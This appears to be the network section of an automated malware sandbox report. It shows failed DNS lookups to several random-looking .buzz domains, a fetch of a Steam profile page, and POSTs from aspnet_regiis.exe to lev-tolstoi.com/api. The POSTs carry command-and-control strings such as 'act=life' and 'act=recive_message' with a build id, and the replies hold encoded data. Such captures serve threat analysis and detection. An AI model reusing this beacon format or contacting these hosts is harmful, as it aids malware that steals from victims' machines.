Dec 27, 2024 22:38:15.715384960 CET | 49737       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:15.716583967 CET | 49737       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:15.716614962 CET | 443         | 49737     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:15.716856003 CET | 443         | 49737     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:15.718017101 CET | 49737       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:15.718118906 CET | 49737       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:15.718132019 CET | 443         | 49737     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:16.485479116 CET | 443         | 49737     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:16.485557079 CET | 443         | 49737     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:16.485739946 CET | 49737       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:16.485739946 CET | 49737       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:16.530283928 CET | 49739       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:16.530364037 CET | 443         | 49739     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:16.530458927 CET | 49739       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:16.530708075 CET | 49739       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:16.530730963 CET | 443         | 49739     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:16.797707081 CET | 49737       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:16.797758102 CET | 443         | 49737     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:17.788454056 CET | 443         | 49739     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:17.788573980 CET | 49739       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:17.839354992 CET | 49739       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:17.839413881 CET | 443         | 49739     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:17.839679956 CET | 443         | 49739     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:17.891339064 CET | 49739       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:17.900599957 CET | 49739       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:17.900676012 CET | 49739       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:17.900686979 CET | 443         | 49739     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:19.549485922 CET | 443         | 49739     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:19.549621105 CET | 443         | 49739     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:19.549724102 CET | 49739       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:19.549889088 CET | 49739       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:19.549936056 CET | 443         | 49739     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:19.596496105 CET | 49743       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:19.596549988 CET | 443         | 49743     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:19.596815109 CET | 49743       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:19.597068071 CET | 49743       | 443       | 192.168.2.4  | 104.21.66.86
Dec 27, 2024 22:38:19.597081900 CET | 443         | 49743     | 104.21.66.86 | 192.168.2.4
Dec 27, 2024 22:38:20.418309927 CET | 49743       | 443       | 192.168.2.4  | 104.21.66.86
Timestamp                           | Source Port | Dest Port | Source IP   | Dest IP
Dec 27, 2024 22:37:56.269686937 CET | 53330       | 53        | 192.168.2.4 | 1.1.1.1
Dec 27, 2024 22:37:56.486180067 CET | 53          | 53330     | 1.1.1.1     | 192.168.2.4
Dec 27, 2024 22:37:56.489458084 CET | 51521       | 53        | 192.168.2.4 | 1.1.1.1
Dec 27, 2024 22:37:56.626764059 CET | 53          | 51521     | 1.1.1.1     | 192.168.2.4
Dec 27, 2024 22:37:56.631659031 CET | 62238       | 53        | 192.168.2.4 | 1.1.1.1
Dec 27, 2024 22:37:56.769398928 CET | 53          | 62238     | 1.1.1.1     | 192.168.2.4
Dec 27, 2024 22:37:56.771704912 CET | 55834       | 53        | 192.168.2.4 | 1.1.1.1
Dec 27, 2024 22:37:56.909754038 CET | 53          | 55834     | 1.1.1.1     | 192.168.2.4
Dec 27, 2024 22:37:56.912681103 CET | 53641       | 53        | 192.168.2.4 | 1.1.1.1
Dec 27, 2024 22:37:57.051012039 CET | 53          | 53641     | 1.1.1.1     | 192.168.2.4
Dec 27, 2024 22:37:57.053174973 CET | 60520       | 53        | 192.168.2.4 | 1.1.1.1
Dec 27, 2024 22:37:57.193907022 CET | 53          | 60520     | 1.1.1.1     | 192.168.2.4
Dec 27, 2024 22:37:57.195772886 CET | 57198       | 53        | 192.168.2.4 | 1.1.1.1
Dec 27, 2024 22:37:57.333448887 CET | 53          | 57198     | 1.1.1.1     | 192.168.2.4
Dec 27, 2024 22:37:57.416230917 CET | 60618       | 53        | 192.168.2.4 | 1.1.1.1
Dec 27, 2024 22:37:57.555262089 CET | 53          | 60618     | 1.1.1.1     | 192.168.2.4
Dec 27, 2024 22:37:57.562666893 CET | 58876       | 53        | 192.168.2.4 | 1.1.1.1
Dec 27, 2024 22:37:57.703793049 CET | 53          | 58876     | 1.1.1.1     | 192.168.2.4
Dec 27, 2024 22:37:57.732498884 CET | 62627       | 53        | 192.168.2.4 | 1.1.1.1
Dec 27, 2024 22:37:57.871201038 CET | 53          | 62627     | 1.1.1.1     | 192.168.2.4
Dec 27, 2024 22:38:00.575695038 CET | 53372       | 53        | 192.168.2.4 | 1.1.1.1
Dec 27, 2024 22:38:00.716245890 CET | 53          | 53372     | 1.1.1.1     | 192.168.2.4
Timestamp                           | Source IP   | Dest IP | Trans ID | OP Code            | Name               | Type           | Class       | DNS over HTTPS
Dec 27, 2024 22:37:56.269686937 CET | 192.168.2.4 | 1.1.1.1 | 0xcbc8   | Standard query (0) | ingreem-eilish.biz | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:37:56.489458084 CET | 192.168.2.4 | 1.1.1.1 | 0xcff2   | Standard query (0) | prisonyfork.buzz   | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:37:56.631659031 CET | 192.168.2.4 | 1.1.1.1 | 0xae86   | Standard query (0) | rebuildeso.buzz    | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:37:56.771704912 CET | 192.168.2.4 | 1.1.1.1 | 0x5add   | Standard query (0) | scentniej.buzz     | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:37:56.912681103 CET | 192.168.2.4 | 1.1.1.1 | 0x9f2a   | Standard query (0) | inherineau.buzz    | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:37:57.053174973 CET | 192.168.2.4 | 1.1.1.1 | 0x52af   | Standard query (0) | screwamusresz.buzz | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:37:57.195772886 CET | 192.168.2.4 | 1.1.1.1 | 0xee36   | Standard query (0) | appliacnesot.buzz  | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:37:57.416230917 CET | 192.168.2.4 | 1.1.1.1 | 0xdbe2   | Standard query (0) | cashfuzysao.buzz   | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:37:57.562666893 CET | 192.168.2.4 | 1.1.1.1 | 0x1ff6   | Standard query (0) | hummskitnj.buzz    | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:37:57.732498884 CET | 192.168.2.4 | 1.1.1.1 | 0xf6bd   | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:38:00.575695038 CET | 192.168.2.4 | 1.1.1.1 | 0x9bd4   | Standard query (0) | lev-tolstoi.com    | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 27, 2024 22:37:56.486180067 CET | 1.1.1.1 | 192.168.2.4 | 0xcbc8 | Name error (3) | ingreem-eilish.biz | none | none | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:37:56.626764059 CET | 1.1.1.1 | 192.168.2.4 | 0xcff2 | Name error (3) | prisonyfork.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:37:56.769398928 CET | 1.1.1.1 | 192.168.2.4 | 0xae86 | Name error (3) | rebuildeso.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:37:56.909754038 CET | 1.1.1.1 | 192.168.2.4 | 0x5add | Name error (3) | scentniej.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:37:57.051012039 CET | 1.1.1.1 | 192.168.2.4 | 0x9f2a | Name error (3) | inherineau.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:37:57.193907022 CET | 1.1.1.1 | 192.168.2.4 | 0x52af | Name error (3) | screwamusresz.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:37:57.333448887 CET | 1.1.1.1 | 192.168.2.4 | 0xee36 | Name error (3) | appliacnesot.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:37:57.555262089 CET | 1.1.1.1 | 192.168.2.4 | 0xdbe2 | Name error (3) | cashfuzysao.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:37:57.703793049 CET | 1.1.1.1 | 192.168.2.4 | 0x1ff6 | Name error (3) | hummskitnj.buzz | none | none | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:37:57.871201038 CET | 1.1.1.1 | 192.168.2.4 | 0xf6bd | No error (0) | steamcommunity.com | | 92.122.104.90 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:38:00.716245890 CET | 1.1.1.1 | 192.168.2.4 | 0x9bd4 | No error (0) | lev-tolstoi.com | | 104.21.66.86 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:38:00.716245890 CET | 1.1.1.1 | 192.168.2.4 | 0x9bd4 | No error (0) | lev-tolstoi.com | | 172.67.157.254 | A (IP address) | IN (0x0001) | false
• steamcommunity.com
• lev-tolstoi.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 92.122.104.90 | 443 | 4820 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 21:37:59 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2024-12-27 21:38:00 UTC | 1905 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Fri, 27 Dec 2024 21:38:00 GMT
Content-Length: 35121
Connection: close
Set-Cookie: sessionid=b78ff060e1e8a66ddaabd955; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-27 21:38:00 UTC | 14479 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-27 21:38:00 UTC | 10097 | IN | Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-27 21:38:00 UTC | 10545 | IN | Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 104.21.66.86 | 443 | 4820 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 21:38:01 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lev-tolstoi.com
2024-12-27 21:38:01 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-27 21:38:02 UTC | 1127 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 21:38:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ah3ithniaild69g8e7qesq11p6; expires=Tue, 22 Apr 2025 15:24:41 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Mkza%2B9mobXKyxeVMqc5sJxNreFiSACgpxZ9lDOw1UQNGFVFWcJEWlYJxPtFR8B0NLTOt%2BnbX%2BtDZDGr%2Fo6Ly03YJZC5Hq7c6a%2FcmqB5rOIbSfHmAHrOv6OFGrX8IrQzUZM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f8c748bd9117277-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1792&rtt_var=713&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1492842&cwnd=225&unsent_bytes=0&cid=81754b725485f40f&ts=736&x=0"
2024-12-27 21:38:02 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-27 21:38:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 104.21.66.86 | 443 | 4820 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 21:38:03 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 86
Host: lev-tolstoi.com
2024-12-27 21:38:03 UTC | 86 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 61 61 64 62 38 38 30 64 61 38 33 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--aadb880da83d&j=b9abc76ce53b6fc3a03566f8f764f5ea
2024-12-27 21:38:04 UTC | 1125 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 21:38:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=4f350da1301ho42aq094k8tp6k; expires=Tue, 22 Apr 2025 15:24:43 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rkxDkNV2oZJADFeCKDEiDs16HrA4y1ZJW1%2F6%2FKvenYHwIJlJV%2Bl2DZTt8fP7xh7Rbv%2BTnBz6zNtHhgpuxcsjGNLVohDYEFoYsigKcex3Q3rizZ8aTr3cgleCkIJ8WJQMjts%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8c74985c857c88-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1811&rtt_var=696&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=985&delivery_rate=1553191&cwnd=219&unsent_bytes=0&cid=282138710cd702a8&ts=779&x=0"
                                                                                                                                                                                                                                            2024-12-27 21:38:04 UTC244INData Raw: 31 64 31 61 0d 0a 38 57 71 66 30 75 6a 68 38 65 7a 41 71 38 63 66 43 63 32 33 32 64 2b 4b 43 39 56 51 48 52 64 2b 63 33 2b 59 74 2f 77 53 48 68 65 4b 53 4f 6e 77 30 74 58 64 7a 72 50 4f 35 53 56 76 72 4e 75 71 75 71 59 70 74 44 51 2f 4c 52 67 53 45 2b 76 53 30 44 42 6f 65 74 4e 51 2b 62 4f 45 6b 70 54 41 34 73 36 2f 50 54 4f 57 7a 50 75 36 35 43 6e 76 63 6e 68 39 48 42 49 54 2b 74 61 58 66 57 35 37 6b 67 4c 7a 74 59 43 45 6b 6f 69 68 78 36 70 36 62 4b 6a 57 73 37 48 6a 5a 72 30 39 50 7a 74 63 46 67 57 36 6a 64 35 66 65 32 4f 51 4a 2f 36 68 67 38 4f 4d 77 4c 75 4a 6f 6e 45 72 39 35 57 34 75 75 68 6e 73 7a 52 32 66 78 59 62 47 2f 76 54 6c 6d 4a 33 63 5a 6b 43 2f 62 61 42 6a 70 75 63 72 4d 32 74 63 57 71 69 31 76 76 7a 71 47
                                                                                                                                                                                                                                            Data Ascii: 1d1a8Wqf0ujh8ezAq8cfCc232d+KC9VQHRd+c3+Yt/wSHheKSOnw0tXdzrPO5SVvrNuquqYptDQ/LRgSE+vS0DBoetNQ+bOEkpTA4s6/PTOWzPu65Cnvcnh9HBIT+taXfW57kgLztYCEkoihx6p6bKjWs7HjZr09PztcFgW6jd5fe2OQJ/6hg8OMwLuJonEr95W4uuhnszR2fxYbG/vTlmJ3cZkC/baBjpucrM2tcWqi1vvzqG
                                                                                                                                                                                                                                            2024-12-27 21:38:04 UTC1369INData Raw: 36 76 63 69 63 31 54 79 4d 65 36 38 53 4c 66 57 78 7a 30 78 65 7a 71 63 71 45 6e 38 37 36 69 61 31 78 5a 61 72 57 74 4c 72 70 61 61 55 39 66 33 59 55 47 52 6e 77 32 70 46 2f 63 6e 2b 55 41 50 53 33 68 59 53 62 69 4b 33 4b 35 54 4d 72 71 4d 33 37 35 61 68 4a 70 7a 46 38 59 52 45 41 58 65 57 62 68 7a 42 37 65 64 4e 51 76 62 61 45 67 70 36 4f 73 4d 47 75 64 6d 36 39 33 72 4b 77 35 57 6d 36 4f 48 42 32 48 42 59 58 38 4e 71 55 64 48 46 34 6c 51 6a 39 38 4d 54 44 6c 4a 62 69 6b 65 56 65 62 72 2f 53 74 36 75 71 55 2f 63 74 4d 57 78 63 46 68 47 36 6a 64 35 34 65 58 61 51 41 2f 4b 7a 67 6f 69 42 6a 72 44 50 71 48 68 35 71 64 43 31 74 2b 74 37 76 54 78 35 64 68 55 61 46 50 2f 53 6d 6a 41 79 4e 5a 51 51 76 65 6a 4b 6f 70 36 46 72 73 4f 79 66 53 75 77 6d 36 4c 39 37
                                                                                                                                                                                                                                            Data Ascii: 6vcic1TyMe68SLfWxz0xezqcqEn876ia1xZarWtLrpaaU9f3YUGRnw2pF/cn+UAPS3hYSbiK3K5TMrqM375ahJpzF8YREAXeWbhzB7edNQvbaEgp6OsMGudm693rKw5Wm6OHB2HBYX8NqUdHF4lQj98MTDlJbikeVebr/St6uqU/ctMWxcFhG6jd54eXaQA/KzgoiBjrDPqHh5qdC1t+t7vTx5dhUaFP/SmjAyNZQQvejKop6FrsOyfSuwm6L97
                                                                                                                                                                                                                                            2024-12-27 21:38:04 UTC1369INData Raw: 36 64 42 59 62 58 62 53 56 6d 57 67 38 4c 64 4d 35 36 72 76 49 74 70 43 41 72 4d 36 7a 50 58 54 68 7a 50 75 36 35 43 6e 76 63 6e 4a 39 47 52 51 53 2b 39 2b 51 64 58 5a 35 6d 77 62 2b 6f 6f 57 48 6b 34 4b 71 77 36 68 7a 62 36 66 63 73 4c 62 75 61 62 59 34 50 7a 74 63 46 67 57 36 6a 64 35 45 65 33 6d 65 42 37 2b 46 69 59 32 64 69 62 53 4a 75 6a 4e 79 37 39 4b 33 2f 62 41 70 75 7a 74 2f 66 68 59 56 48 66 33 59 6d 33 4e 37 64 70 34 50 39 37 36 4e 68 35 2b 48 72 38 2b 6c 65 6d 2b 71 78 37 36 30 35 47 58 33 66 44 39 79 42 46 46 46 75 76 71 5a 5a 6e 39 61 6b 42 6e 30 38 4a 58 4e 69 73 36 6c 78 65 55 6c 4b 36 6a 51 73 37 62 75 59 62 63 67 65 6e 73 58 45 42 66 38 31 4a 4e 38 65 6e 57 53 43 50 75 38 69 6f 53 55 6e 4c 44 4d 6f 32 39 68 37 35 76 37 75 76 41 70 37 33
                                                                                                                                                                                                                                            Data Ascii: 6dBYbXbSVmWg8LdM56rvItpCArM6zPXThzPu65CnvcnJ9GRQS+9+QdXZ5mwb+ooWHk4Kqw6hzb6fcsLbuabY4PztcFgW6jd5Ee3meB7+FiY2dibSJujNy79K3/bApuzt/fhYVHf3Ym3N7dp4P976Nh5+Hr8+lem+qx7605GX3fD9yBFFFuvqZZn9akBn08JXNis6lxeUlK6jQs7buYbcgensXEBf81JN8enWSCPu8ioSUnLDMo29h75v7uvAp73
                                                                                                                                                                                                                                            2024-12-27 21:38:04 UTC1369INData Raw: 53 56 33 35 32 70 64 2f 64 48 32 63 42 2f 6d 2b 6a 49 57 65 69 36 33 44 74 33 56 6c 6f 74 36 30 74 76 70 70 75 6a 5a 7a 63 52 51 61 46 37 71 62 33 6e 64 6b 4e 63 74 49 79 4c 32 46 67 35 43 59 34 74 62 72 5a 43 75 6f 32 66 76 6c 71 47 57 35 4d 6e 42 35 45 42 6f 56 2b 39 6d 51 64 33 6c 38 6d 77 44 76 73 59 36 4c 6b 6f 43 74 79 4b 46 34 62 71 76 53 76 37 76 6e 4b 66 6c 79 65 47 31 63 53 56 33 56 38 71 73 79 58 55 2f 54 46 37 4f 70 79 6f 53 66 7a 76 71 4a 71 58 35 6e 70 39 71 39 74 4f 52 6a 76 6a 6c 7a 66 68 67 64 46 50 2f 54 6e 33 56 35 64 4a 63 45 39 37 61 4a 67 4a 79 42 72 63 48 6c 4d 79 75 6f 7a 66 76 6c 71 45 79 67 4f 58 46 7a 58 41 35 54 34 35 57 5a 66 44 77 74 30 77 54 30 74 6f 79 47 6e 34 2b 6b 77 61 42 31 62 36 37 54 76 62 37 6e 62 62 49 7a 63 48 45
                                                                                                                                                                                                                                            Data Ascii: SV352pd/dH2cB/m+jIWei63Dt3Vlot60tvppujZzcRQaF7qb3ndkNctIyL2Fg5CY4tbrZCuo2fvlqGW5MnB5EBoV+9mQd3l8mwDvsY6LkoCtyKF4bqvSv7vnKflyeG1cSV3V8qsyXU/TF7OpyoSfzvqJqX5np9q9tORjvjlzfhgdFP/Tn3V5dJcE97aJgJyBrcHlMyuozfvlqEygOXFzXA5T45WZfDwt0wT0toyGn4+kwaB1b67Tvb7nbbIzcHE
                                                                                                                                                                                                                                            2024-12-27 21:38:04 UTC1369INData Raw: 63 65 66 66 58 64 6e 6c 41 66 35 74 34 61 46 6e 49 69 6a 7a 4b 39 78 62 4b 72 65 74 4c 47 6f 4a 2f 63 31 5a 7a 56 45 55 54 50 78 78 6f 6c 7a 63 6e 36 46 45 37 32 76 78 4a 72 54 69 61 36 4a 2f 54 31 6f 70 4e 36 2f 76 65 52 70 73 7a 39 2f 5a 78 4d 57 47 76 50 65 6a 48 70 37 63 70 67 41 39 72 2b 4d 6b 5a 2b 41 73 4d 79 33 62 79 76 68 6c 62 79 6c 71 44 48 33 42 48 68 6c 44 42 4a 66 79 38 4f 64 5a 6e 64 34 6e 30 6a 69 2f 70 50 44 6c 49 4c 69 6b 65 56 37 5a 4b 62 57 74 4c 7a 68 5a 62 6f 33 64 6e 41 64 46 78 6e 77 33 35 35 32 65 6e 53 57 41 76 36 78 67 49 71 55 68 71 58 4b 74 7a 30 6c 37 39 4b 6a 2f 62 41 70 6e 6a 56 74 65 77 78 52 41 72 54 4d 33 6e 64 77 4e 63 74 49 2b 62 71 46 68 35 53 43 70 4d 79 6a 63 47 71 67 31 4c 75 79 37 47 4b 2b 4e 48 35 34 47 52 77 5a
                                                                                                                                                                                                                                            Data Ascii: ceffXdnlAf5t4aFnIijzK9xbKretLGoJ/c1ZzVEUTPxxolzcn6FE72vxJrTia6J/T1opN6/veRpsz9/ZxMWGvPejHp7cpgA9r+MkZ+AsMy3byvhlbylqDH3BHhlDBJfy8OdZnd4n0ji/pPDlILikeV7ZKbWtLzhZbo3dnAdFxnw3552enSWAv6xgIqUhqXKtz0l79Kj/bApnjVtewxRArTM3ndwNctI+bqFh5SCpMyjcGqg1Luy7GK+NH54GRwZ
                                                                                                                                                                                                                                            2024-12-27 21:38:04 UTC1369INData Raw: 77 38 4c 64 4d 49 39 37 57 41 6a 70 43 42 6f 64 75 6b 65 33 6d 76 32 4c 47 76 34 6d 4b 79 50 33 4a 34 48 78 63 62 38 64 6d 4d 65 58 78 32 6d 45 69 7a 38 49 32 62 30 39 62 69 36 72 4a 72 59 61 6a 5a 72 62 62 70 61 71 45 2f 62 7a 56 53 55 51 7a 39 78 4e 34 6f 61 6d 57 45 44 2b 4c 2b 6b 38 4f 55 67 75 4b 52 35 58 74 69 71 64 4b 39 73 2f 70 73 73 54 31 77 66 42 55 56 46 66 6e 56 6d 6e 52 37 63 4a 41 45 39 72 65 4a 6a 4a 65 48 72 4d 43 71 50 53 58 76 30 71 50 39 73 43 6d 57 4b 58 78 35 45 56 45 43 74 4d 7a 65 64 33 41 31 79 30 6a 78 76 6f 2b 44 6d 59 69 6d 7a 4b 4e 33 62 71 2f 65 75 4c 4c 73 62 37 4d 39 66 33 34 56 45 42 76 2f 33 35 56 32 63 58 61 56 44 72 33 2b 79 6f 53 4c 7a 76 71 4a 68 57 5a 6d 6f 39 4c 37 6f 71 5a 77 39 7a 56 7a 4e 55 52 52 46 76 62 52 6d
                                                                                                                                                                                                                                            Data Ascii: w8LdMI97WAjpCBoduke3mv2LGv4mKyP3J4Hxcb8dmMeXx2mEiz8I2b09bi6rJrYajZrbbpaqE/bzVSUQz9xN4oamWED+L+k8OUguKR5XtiqdK9s/pssT1wfBUVFfnVmnR7cJAE9reJjJeHrMCqPSXv0qP9sCmWKXx5EVECtMzed3A1y0jxvo+DmYimzKN3bq/euLLsb7M9f34VEBv/35V2cXaVDr3+yoSLzvqJhWZmo9L7oqZw9zVzNURRFvbRm
